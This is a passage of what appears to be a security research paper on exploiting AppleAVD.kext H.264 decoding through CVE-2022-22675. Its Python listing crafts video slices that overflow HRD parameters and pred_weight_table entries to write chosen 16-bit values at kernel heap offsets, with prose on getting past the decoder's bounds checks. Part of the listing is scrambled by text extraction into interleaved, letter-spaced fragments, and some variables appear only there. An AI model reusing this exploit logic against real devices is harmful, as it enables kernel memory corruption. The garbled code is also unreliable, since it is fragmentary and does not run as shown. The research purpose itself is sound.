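    print([exhausted.read_se() for _ in range(3)])  # [0, 0, 0]
    print(hex(sign_extend_u8_to_u32(0x80)))  # 0xffffff80
```

Because an exhausted reader yields a single 1 bit per ue(v) read, every weight and offset decodes to 0 and never fails the [0, 255] check. For an overwritten count of 0x80, the widened bound is 0xFFFFFF80 (4,294,967,168), consistent with the lower bound stated above.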
Therefore, to escape the 32-bit sign-extended loop, we encode a weight or offset element in the range [256, 65535] at the point we would like to target. To do so, we need to enable the luma and chroma flags and fill in the corresponding luma_weight, luma_offset, chroma_weight, and chroma_offset entries. The flags are decoded and checked on each loop iteration, so we include an encoding of the flags in the generated bitstream. When the flags are set to true, we can write values in the range [0, 255] without exiting early. When they are set to false, AppleAVD.kext writes a default value at those locations. Either way, intermediate memory up to our target is modified. Because the flags must be checked on each iteration, the slice header size is proportional to the target offset. In all, writing an arbitrary sequence of 16-bit values to memory requires n slices for n larger-than-255 values, with smaller values written by enabling intermediate flags.
When using multiple slices for multiple writes, each slice must be within an IDR NALU, as the out-of-bounds luma/chroma offset/weight is treated as a decoding error, and the decoder uses IDR NALUs for recovery. We adjust the slices using the same technique we used for the infinite loop bug discussed in Section 5.1.

Listing 2: CVE-2022-22675 video transform.

def cve_2022_22675(ds, message):
    from helpers import new_vui_parameter, new_hrd_parameter, clone_and_append_existing_slice
    import math

    # This is the offset from the start of the context
    # - Object size is 0x8642b0
    # - Allocated size is 0x868000
    offset = 0x868000
    # Keep this even with no short in the range [0x0000, 0x007f]
    message_hex = "deadbeef41414141"

    message_snippets = [int(message_hex[i:i + 4], 16) for i in range(0, len(message_hex), 4)][::-1]

    print("\tWriting '0x{}' at furthest offset location 0x{:x}".format(message_hex, offset))

    #####
    # Step 1. Use parseHRD overwrite to change the default num_ref_idx value
    #####

    # We need this flag enabled to go into second overwrite
    ds["ppses"][0]["weighted_pred_flag"] = True

    # Prepare our overwriting SPS
    sps_idx = 1  # We target the 2nd SPS
    cpb_cnt_minus1 = 68  # This value is limited to 255; we set it to 68 for targeting

    pps_tgt_payload0 = num_ref_idx_payload << 16  # bottom byte is num_ref_idx_l0_default_active_minus1
    pps_tgt_payload0 |= num_ref_idx_payload << 8  # top byte is num_ref_idx_l1_default_active_minus1
    pps_tgt_payload0 |= int(ds["ppses"][0]["weighted_pred_flag"]) << 24  # value is a byte
    ds["spses"][sps_idx]["vui_parameters"]["vcl_hrd_parameters"]["cpb_size_values_minus1"][ref_idx_overwrite_idx] = pps_tgt_payload0

    #####
    # Step 2. Prepare for our second overwrite in pred_weight_table decoding
    #####

    # Set all slices to IDR slices to avoid "missing Keyframe" error
    for i in range(len(ds["nalu_headers"])):
        if ds["nalu_headers"][i]["nal_unit_type"] == 1:
            ds["nalu_headers"][i]["nal_unit_type"] = 5

    print("\tNeed {} P slices to write the message 0x{}".format(len(message_snippets), message_hex))

    nalu_idx = 4  # Our video is SPS, PPS, SPS, I, P so we copy index 4
    slice_idx = 1  # We want the P slice to be copied
    while len(ds["slices"]) <= len(message_snippets):
        ds = clone_and_append_existing_slice(ds, nalu_idx, slice_idx)

    #####
    # Step 3. Modify relevant slices to write our target message
    #####
    for i in range(1, len(ds["slices"])):
        ds["slices"][i]["sh"]["num_ref_idx_active_override_flag"] = False
        avcusercontext_offset = offset  # This will write right next to our previous write
        offset_from_slice = avcusercontext_offset - 0x374d4  # this constant is the start of the Slice offset
        # Integer division keeps the list sizes and indices below integral
        chroma_offset_overwrite_num = (offset_from_slice - 0x206) // 4  # 0x206 is the offset from the start of the slice
        slice_num_ref_idx_payload = chroma_offset_overwrite_num + (1 - i) // 2 + int(math.ceil(len(message_hex) / 8.0))

        # If we have an odd number of 'short' types we want to write,
        # and if we're writing the lower end of bytes, we need to
        # slightly recalibrate where we write
        if len(ds["slices"]) % 2 == 0 and i % 2 == 0:
            slice_num_ref_idx_payload -= 1
        ds["slices"][i]["sh"]["num_ref_idx_l0_active_minus1"] = slice_num_ref_idx_payload
        ds["slices"][i]["sh"]["luma_log2_weight_denom"] = 0  # 1 << X is stored
        ds["slices"][i]["sh"]["chroma_log2_weight_denom"] = 0  # 1 << X is stored
        ds["slices"][i]["sh"]["luma_weight_l0_flag"] = [False] * (slice_num_ref_idx_payload + 1)

        # on the device, this is shifted by the sps.bit_depth_luma_value_minus8
        ds["slices"][i]["sh"]["luma_weight_l0"] = [0] * (slice_num_ref_idx_payload + 1)
        ds["slices"][i]["sh"]["luma_offset_l0"] = [0] * (slice_num_ref_idx_payload + 1)
        ds["slices"][i]["sh"]["chroma_weight_l0_flag"] = [False] * (slice_num_ref_idx_payload + 1)

        # on the device, this is shifted by the sps.bit_depth_chroma_value_minus8
        ds["slices"][i]["sh"]["chroma_weight_l0"] = [[0, 0]] * (slice_num_ref_idx_payload + 1)
        ds["slices"][i]["sh"]["chroma_offset_l0"] = [[0, 0]] * (slice_num_ref_idx_payload + 1)

        # The location we're overwriting
        ds["slices"][i]["sh"]["chroma_weight_l0_flag"][slice_num_ref_idx_payload] = True
        ds["slices"][i]["sh"]["chroma_weight_l0"][slice_num_ref_idx_payload] = [0x64 + i, 0x65 + i]

        # Our target overwrite location
        if len(ds["slices"]) % 2 == 1:  # We are writing an even number of shorts
            if i % 2 == 1:
                ds["slices"][i]["sh"]["chroma_offset_l0"][slice_num_ref_idx_payload] = [message_snippets[i], 0x20]
26 r e f _ i d x _ o v e r w r i t e _ i d x = 68 # F i r s t i n d e x where we o v e r w r i t e t h e
100 else :
num_ref_idx_l0_default_active_minus1
101 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
27 num_ref_idx_payload = 0 xff
= [ 0 x21 , m e s s a g e _ s n i p p e t s [ i − 2 ] ]
28
102 e l s e : # odd number o f s h o r t v a l u e s
29 d s [ " s p s e s " ] [ s p s _ i d x ] [ " s e q _ p a r a m e t e r _ s e t _ i d " ] = 31
103 i f i % 2 == 0 :
30 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s _ p r e s e n t _ f l a g " ] = True
104 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
31 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] = new_vui_parameter ( )
= [ 0 x20 , m e s s a g e _ s n i p p e t s [ i − 1 ] ]
32
105 else :
33 # To maximize o u r o v e r w r i t e , we f o c u s on VCL HRD p a r a m e t e r s , g i v e n i t i s
106 ds [ " s l i c e s " ] [ i ] [ " sh " ] [ " c h r o m a _ o f f s e t _ l 0 " ] [ s l i c e _ n u m _ r e f _ i d x _ p a y l o a d ]
c l o s e s t t o t h e end o f t h e o b j e c t
= [ m e s s a g e _ s n i p p e t s [ i − 1 ] , 0 x21 ]
34 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s _ p r e s e n t _ f l a g " ] =
107 r e t u r n ds
True
35 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] =
new_hrd_parameter ( )
36 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
cpb_cnt_minus1 " ] = cpb_cnt_minus1
37 # F i l l up w i t h j u n k and we w i l l w r i t e o v e r what v a l u e s m a t t e r
38 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
b i t _ r a t e _ v a l u e _ m i n u s 1 " ] = [ i f o r i i n range ( cpb_cnt_minus1 +1) ]
39 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ "
c p b _ s i z e _ v a l u e s _ m i n u s 1 " ] = [ i + c p b _ c n t _ m i n u s 1 +1 f o r i i n r a n g e (
c p b _ c n t _ m i n u s 1 +1 ) ]
40 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ " c b r _ f l a g " ] =
[ F a l s e ] * ( cpb_cnt_minus1 +1)
41 ds [ " s p s e s " ] [ s p s _ i d x ] [ " v u i _ p a r a m e t e r s " ] [ " v c l _ h r d _ p a r a m e t e r s " ] [ " c b r _ f l a g " ] [
r e f _ i d x _ o v e r w r i t e _ i d x − 5 ] = T r u e # PPS E n t r o p y e n c o d i n g
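The message-preparation step in Listing 2 splits a hex string into 16-bit values and reverses their order before they are spread across slices. The following is a minimal standalone sketch of that step using the listing's example string "deadbeef41414141". The function names `split_message` and `check_message` are illustrative, and the check is our own reading of the listing's comment "Keep this even with no short in the range [0x0000, 0x007f]" (interpreting "even" as an even number of shorts is an assumption).

```python
def split_message(message_hex: str) -> list[int]:
    """Split a hex string into 16-bit values, last short first (as in Listing 2)."""
    if len(message_hex) % 4 != 0:
        raise ValueError("message must be a whole number of 16-bit shorts")
    shorts = [int(message_hex[i:i + 4], 16) for i in range(0, len(message_hex), 4)]
    return shorts[::-1]


def check_message(shorts: list[int]) -> None:
    """Hypothetical check mirroring the listing's comment; reading 'even'
    as 'an even number of shorts' is an assumption."""
    if len(shorts) % 2 != 0:
        raise ValueError("expected an even number of shorts")
    for s in shorts:
        if 0x0000 <= s <= 0x007F:
            raise ValueError(f"short 0x{s:04x} falls in the disallowed range")


snippets = split_message("deadbeef41414141")
check_message(snippets)
print([hex(s) for s in snippets])  # ['0x4141', '0x4141', '0xbeef', '0xdead']
```

Because of the final `[::-1]`, the first short of the message (0xdead) ends up last in the list that the slice loop indexes into.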
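The final branch of Listing 2 decides which [Cb, Cr] `chroma_offset_l0` pair each slice writes at the overwrite index, interleaving one message short with a filler value of 0x20 or 0x21 depending on the parity of the slice count and the slice index. The sketch below isolates that branch as a pure function so the resulting layout can be inspected without building a bitstream. The name `chroma_offset_pair` is hypothetical, and the function only mirrors the listing's logic; it makes no claim about how the decoder consumes these values.

```python
def chroma_offset_pair(i: int, num_slices: int, snippets: list[int]) -> list[int]:
    """Return the [cb, cr] chroma_offset_l0 pair written for slice i.

    Mirrors the parity branches at the end of Listing 2. As in the listing,
    a negative index (e.g. i - 2 when i == 0) wraps around in Python.
    """
    if num_slices % 2 == 1:  # listing: "We are writing an even number of shorts"
        if i % 2 == 1:
            return [snippets[i], 0x20]
        return [0x21, snippets[i - 2]]
    # listing: "odd number of short values"
    if i % 2 == 0:
        return [0x20, snippets[i - 1]]
    return [snippets[i - 1], 0x21]


# Reversed shorts of "deadbeef41414141", as produced in Listing 2.
snippets = [0x4141, 0x4141, 0xBEEF, 0xDEAD]
for i in range(1, 4):
    print(i, [hex(v) for v in chroma_offset_pair(i, 4, snippets)])
```

Keeping the branch as a side-effect-free function makes it easy to print the pair for every slice index before committing to a particular number of slices.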
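Step 1 of Listing 2 depends on the HRD parser accepting `cpb_cnt_minus1 = 68`, while the listing's own comment notes that the device only caps this value at 255. The H.264 specification (Annex E) requires `cpb_cnt_minus1` to lie in 0 to 31, so a conforming stream never carries more than 32 entries per HRD field (`bit_rate_value_minus1`, `cpb_size_value_minus1`, `cbr_flag`). The sketch below contrasts the spec-conformant check with a count of entries an unchecked loop would write past a 32-entry table. The fixed 32-entry-per-field layout is an assumption made for illustration and is not a description of the decoder's actual structure; `validate_cpb_cnt` and `entries_past_table` are hypothetical names.

```python
# H.264 Annex E: cpb_cnt_minus1 shall be in the range 0..31, inclusive.
MAX_CPB_CNT = 32


def validate_cpb_cnt(cpb_cnt_minus1: int) -> int:
    """Return the number of per-CPB entries, rejecting out-of-spec values."""
    if not 0 <= cpb_cnt_minus1 < MAX_CPB_CNT:
        raise ValueError(
            f"cpb_cnt_minus1={cpb_cnt_minus1} outside 0..{MAX_CPB_CNT - 1}")
    return cpb_cnt_minus1 + 1


def entries_past_table(cpb_cnt_minus1: int, capacity: int = MAX_CPB_CNT) -> int:
    """Entries an unchecked loop would write beyond a capacity-sized table
    (hypothetical layout: one fixed-size array per HRD field)."""
    return max(0, cpb_cnt_minus1 + 1 - capacity)


print(entries_past_table(68))  # 37, for the value Listing 2 uses
```

Under this assumed layout, the 69 entries implied by `cpb_cnt_minus1 = 68` exceed a 32-entry table by 37, whereas a parser that enforces the Annex E range would reject the SPS outright.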